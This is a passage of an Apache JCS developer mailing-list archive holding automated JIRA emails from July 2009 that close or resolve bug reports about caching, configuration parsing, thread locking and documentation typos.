+0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 232DF234C053 for <[email protected]>; Thu, 23 Jul 2009 12:14:15 -0700 (PDT) Message-ID: <+1-743-284-3994.1248376455143.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:14:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-56) serialization/deserialization problem across blocks in diskBlockCache In-Reply-To: <1912284328.1234569059591.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-56?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-56. -------------------------- > serialization/deserialization problem across blocks in diskBlockCache > --------------------------------------------------------------------- > > Key: JCS-56 > URL: https://issues.apache.org/jira/browse/JCS-56 > Project: JCS > Issue Type: Bug > Affects Versions: jcs-1.3 > Environment: Problem encountered on both xp and linux. > Reporter: Robert Fuller > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > Attachments: cache.ccf, JCSByteArrayTest.java > > > Object containing utf-8 string or byte array may be corrupted on retrieval from disk cache. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:09 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26625 invoked from network); 23 Jul 2009 19:15:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:57 -0000 Received: (qmail 2133 invoked by uid 500); 23 Jul 2009 19:14:37 -0000 Delivered-To: [email protected] Received: (qmail 2113 invoked by uid 500); 23 Jul 2009 19:14:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 2084 invoked by uid 99); 23 Jul 2009 19:14:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 052AB234C046 for <[email protected]>; Thu, 23 Jul 2009 12:14:15 -0700 (PDT) Message-ID: <1532058954.1248376455020.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:14:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (JCS-53) Programmatic configuration does not correctly read inherited Properties In-Reply-To: <1653361815.1221516464297.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-53?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts resolved JCS-53. ---------------------------- Resolution: Fixed Fixed in 161.129.204.104. > Programmatic configuration does not correctly read inherited Properties > ----------------------------------------------------------------------- > > Key: JCS-53 > URL: https://issues.apache.org/jira/browse/JCS-53 > Project: JCS > Issue Type: Bug > Components: Composite Cache > Affects Versions: jcs-1.3 > Reporter: Phillip Liu > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > > When calling ConfigureCacheManager.configure(properties, false) with a Properties instance containing defaults, the defaults are not correctly read. The problem is in PropertySetter.java:135 > for ( Enumeration e = properties.keys(); e.hasMoreElements(); ) > ... > Instead of calling properties.keys(), it should be calling properties.propertyNames(). The call to propertyNames() correctly refer to configured defaults, and keys() does not. This should be a simple fix, how does one create a patch? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:11 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26643 invoked from network); 23 Jul 2009 19:15:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:15:57 -0000 Received: (qmail 2071 invoked by uid 500); 23 Jul 2009 19:14:37 -0000 Delivered-To: [email protected] Received: (qmail 2051 invoked by uid 500); 23 Jul 2009 19:14:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 2022 invoked by uid 99); 23 Jul 2009 19:14:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:14:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 389A129A0019 for <[email protected]>; Thu, 23 Jul 2009 12:14:15 -0700 (PDT) Message-ID: <718901125.1248376455231.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:14:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-53) Programmatic configuration does not correctly read inherited Properties In-Reply-To: <1653361815.1221516464297.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-53?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-53. -------------------------- > Programmatic configuration does not correctly read inherited Properties > ----------------------------------------------------------------------- > > Key: JCS-53 > URL: https://issues.apache.org/jira/browse/JCS-53 > Project: JCS > Issue Type: Bug > Components: Composite Cache > Affects Versions: jcs-1.3 > Reporter: Phillip Liu > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > > When calling ConfigureCacheManager.configure(properties, false) with a Properties instance containing defaults, the defaults are not correctly read. The problem is in PropertySetter.java:135 > for ( Enumeration e = properties.keys(); e.hasMoreElements(); ) > ... > Instead of calling properties.keys(), it should be calling properties.propertyNames(). The call to propertyNames() correctly refer to configured defaults, and keys() does not. This should be a simple fix, how does one create a patch? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28236 invoked from network); 23 Jul 2009 19:16:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:16:11 -0000 Received: (qmail 49094 invoked by uid 500); 23 Jul 2009 19:16:37 -0000 Delivered-To: [email protected] Received: (qmail 49064 invoked by uid 500); 23 Jul 2009 19:16:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 49026 invoked by uid 99); 23 Jul 2009 19:16:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E0D19234C046 for <[email protected]>; Thu, 23 Jul 2009 12:16:14 -0700 (PDT) Message-ID: <1938577478.1248376574919.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:16:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-21) JCS has inconsistent locking of shared data In-Reply-To: <13364313.1174231989274.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-21?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-21. -------------------------- > JCS has inconsistent locking of shared data > ------------------------------------------- > > Key: JCS-21 > URL: https://issues.apache.org/jira/browse/JCS-21 > Project: JCS > Issue Type: Bug > Affects Versions: jcs-161.129.204.104.2 > Reporter: Michael Stevens > Assignee: Aaron Smuts > Attachments: locking.diff > > > I've been looking at the trunk JCS code with findbugs (http://findbugs.sf.net/). > One of the things it does is warn when data is inconsistently synchronized - ie when it is sometimes referenced inside a synchronized block and sometimes not. This is not threadsafe - one thread may read old or inconsistent data. > I've patched all the places findbugs complains about by adding appropriate synchronized() blocks. > I suspect this change may require some discussion :) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28241 invoked from network); 23 Jul 2009 19:16:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:16:11 -0000 Received: (qmail 49930 invoked by uid 500); 23 Jul 2009 19:16:39 -0000 Delivered-To: [email protected] Received: (qmail 49878 invoked by uid 500); 23 Jul 2009 19:16:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 49811 invoked by uid 99); 23 Jul 2009 19:16:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 04FDB234C1E6 for <[email protected]>; Thu, 23 Jul 2009 12:16:15 -0700 (PDT) Message-ID: <377408912.1248376575019.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:16:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-14) Threadpool manager will never create bounded queues MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-14?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-14. -------------------------- > Threadpool manager will never create bounded queues > --------------------------------------------------- > > Key: JCS-14 > URL: https://issues.apache.org/jira/browse/JCS-14 > Project: JCS > Issue Type: Bug > Affects Versions: jcs-161.129.204.104.2 > Reporter: Martin Bosak > Assignee: Aaron Smuts > Priority: Minor > > In ThreadPoolManager.loadConfig() method, the following code to retrieve the 'useBoundary' property will always result in calling config.setUseBoundary() with a value of false: > config.setUseBoundary( Boolean.getBoolean( (String) props.get( root + ".useBoundary" ) ) ); > The problem stems from Boolean.getBoolean() method always searches for the supplied parameter as a System property (i.e., set via the -D command line parameter). > Also, props.get(root + ".useBoundary" ) will return the value of the property; which in turn is used as the PROPERTY NAME to retrieve from System.properties. This results in searching for a system property named either "true" or "false"!! > I think the code should read: > config.setUseBoundary( Boolean.valueOf(props.getProperty( root + ".useBoundary" ) ) ); -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28265 invoked from network); 23 Jul 2009 19:16:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:16:12 -0000 Received: (qmail 49842 invoked by uid 500); 23 Jul 2009 19:16:39 -0000 Delivered-To: [email protected] Received: (qmail 49808 invoked by uid 500); 23 Jul 2009 19:16:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 49785 invoked by uid 99); 23 Jul 2009 19:16:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id EE453234C051 for <[email protected]>; Thu, 23 Jul 2009 12:16:14 -0700 (PDT) Message-ID: <1362303699.1248376574975.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:16:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-10) Remote Cache Events Are Lost Between Primary Failure and Failover Connection MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-10?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-10. -------------------------- > Remote Cache Events Are Lost Between Primary Failure and Failover Connection > ---------------------------------------------------------------------------- > > Key: JCS-10 > URL: https://issues.apache.org/jira/browse/JCS-10 > Project: JCS > Issue Type: Improvement > Components: RMI Remote Cache > Affects Versions: jcs-161.129.204.104, jcs-161.129.204.104 > Environment: All > Reporter: Aaron Smuts > Assignee: Aaron Smuts > > When the remote cache client encounters an error communicating with the server it substitutes a balking facade (a zombie) for the service and then initiates the failover / recovery process. Events on the remote cache event queue are sent to the zombie during the period between the failure and the failover connection. The Zombie simply balks. Hence the events are lost. In an environment with a failover--a hot standby--remote server, this is not desireable. It would be better if no events were lost to the Zombie. > The best solution is to make the Zombie a bounded queue. Events that flood into the Zombie should be put to the failover or the primary when the connection is established. The Zombie must be capable of limiting the size of this queue. When the remote cache restore process sets the remote server handle on client, the client should check to see if if the current handle is a zombie. If the current server is a zombie, it should put into service the good server and then walk the zombie queue. > Since failover switching is very quick, few items should be queued. > When handle error is called, the event should be passed to the zombie so it is not lost. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28267 invoked from network); 23 Jul 2009 19:16:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:16:12 -0000 Received: (qmail 49940 invoked by uid 500); 23 Jul 2009 19:16:39 -0000 Delivered-To: [email protected] Received: (qmail 49886 invoked by uid 500); 23 Jul 2009 19:16:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 49817 invoked by uid 99); 23 Jul 2009 19:16:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1503729A0019 for <[email protected]>; Thu, 23 Jul 2009 12:16:15 -0700 (PDT) Message-ID: <1840724031.1248376575085.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:16:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-18) spelling mistakes in javadoc In-Reply-To: <24816342.1173129290784.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-18?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-18. -------------------------- > spelling mistakes in javadoc > ---------------------------- > > Key: JCS-18 > URL: https://issues.apache.org/jira/browse/JCS-18 > Project: JCS > Issue Type: Bug > Components: Documentation > Reporter: Michael Stevens > Assignee: Aaron Smuts > Priority: Trivial > Attachments: jcs.diff > > > JCS javadoc has many spelling errors. I've attached a patch that fixes some more. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:16:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28213 invoked from network); 23 Jul 2009 19:16:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:16:11 -0000 Received: (qmail 49104 invoked by uid 500); 23 Jul 2009 19:16:37 -0000 Delivered-To: [email protected] Received: (qmail 49070 invoked by uid 500); 23 Jul 2009 19:16:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 49028 invoked by uid 99); 23 Jul 2009 19:16:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:16:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 0FA3229A0015 for <[email protected]>; Thu, 23 Jul 2009 12:16:15 -0700 (PDT) Message-ID: <610937308.1248376575063.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:16:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-19) [PATCH] website docs have many spelling errors In-Reply-To: <14396804.1173562509250.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-19?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-19. -------------------------- > [PATCH] website docs have many spelling errors > ---------------------------------------------- > > Key: JCS-19 > URL: https://issues.apache.org/jira/browse/JCS-19 > Project: JCS > Issue Type: Bug > Components: Documentation > Affects Versions: jcs-161.129.204.104.2 > Reporter: Michael Stevens > Assignee: Aaron Smuts > Priority: Minor > Fix For: jcs-161.129.204.104.2 > > Attachments: jcs.xdocs.diff > > > I found some spelling errors on the website so I went through and corrected everything I could find in the xdocs directory of the svn repo. Patch attached. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:17:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31579 invoked from network); 23 Jul 2009 19:17:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:17:32 -0000 Received: (qmail 68278 invoked by uid 500); 23 Jul 2009 19:18:37 -0000 Delivered-To: [email protected] Received: (qmail 68255 invoked by uid 500); 23 Jul 2009 19:18:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 68242 invoked by uid 99); 23 Jul 2009 19:18:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:18:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:18:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3B34A29A001C for <[email protected]>; Thu, 23 Jul 2009 12:18:15 -0700 (PDT) Message-ID: <1726428716.1248376695241.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:18:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-2) Items read from disk auxilaries are spooled back to disk. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-2?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-2. ------------------------- > Items read from disk auxilaries are spooled back to disk. > --------------------------------------------------------- > > Key: JCS-2 > URL: https://issues.apache.org/jira/browse/JCS-2 > Project: JCS > Issue Type: Bug > Components: Composite Cache > Environment: Any > Reporter: Peter Schwarz > Assignee: Aaron Smuts > > Items that have been read from disk are spooling back to disk. During a large volume of reads, this causes elements that have been read into the cache to be written back to disk, even though there have been no modifications. > This increase in writes doubles the over all average read time by a factor of 2. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:17:34 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31634 invoked from network); 23 Jul 2009 19:17:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:17:33 -0000 Received: (qmail 68584 invoked by uid 500); 23 Jul 2009 19:18:39 -0000 Delivered-To: [email protected] Received: (qmail 68563 invoked by uid 500); 23 Jul 2009 19:18:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 68553 invoked by uid 99); 23 Jul 2009 19:18:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:18:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:18:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D611A234C046 for <[email protected]>; Thu, 23 Jul 2009 12:18:14 -0700 (PDT) Message-ID: <529737369.1248376694862.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:18:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-17) Typo's in javadoc and logging MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-17?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-17. -------------------------- > Typo's in javadoc and logging > ----------------------------- > > Key: JCS-17 > URL: https://issues.apache.org/jira/browse/JCS-17 > Project: JCS > Issue Type: Improvement > Reporter: Martin van den Bemt > Assignee: Aaron Smuts > Attachments: jcs.lateral.diff, jcs.spelling.diff > > > Patches supplied on jcs-dev by Michael Stevens -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 19:17:34 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31689 invoked from network); 23 Jul 2009 19:17:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 19:17:34 -0000 Received: (qmail 68856 invoked by uid 500); 23 Jul 2009 19:18:39 -0000 Delivered-To: [email protected] Received: (qmail 68835 invoked by uid 500); 23 Jul 2009 19:18:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 68744 invoked by uid 99); 23 Jul 2009 19:18:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:18:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 19:18:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 45A8A29A001F for <[email protected]>; Thu, 23 Jul 2009 12:18:15 -0700 (PDT) Message-ID: <1951654130.1248376695284.JavaMail.jira@brutus> Date: Thu, 23 Jul 2009 12:18:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-20) Clear JDBC region cache In-Reply-To: <648939.1173700629273.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-20?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-20. -------------------------- > Clear JDBC region cache > 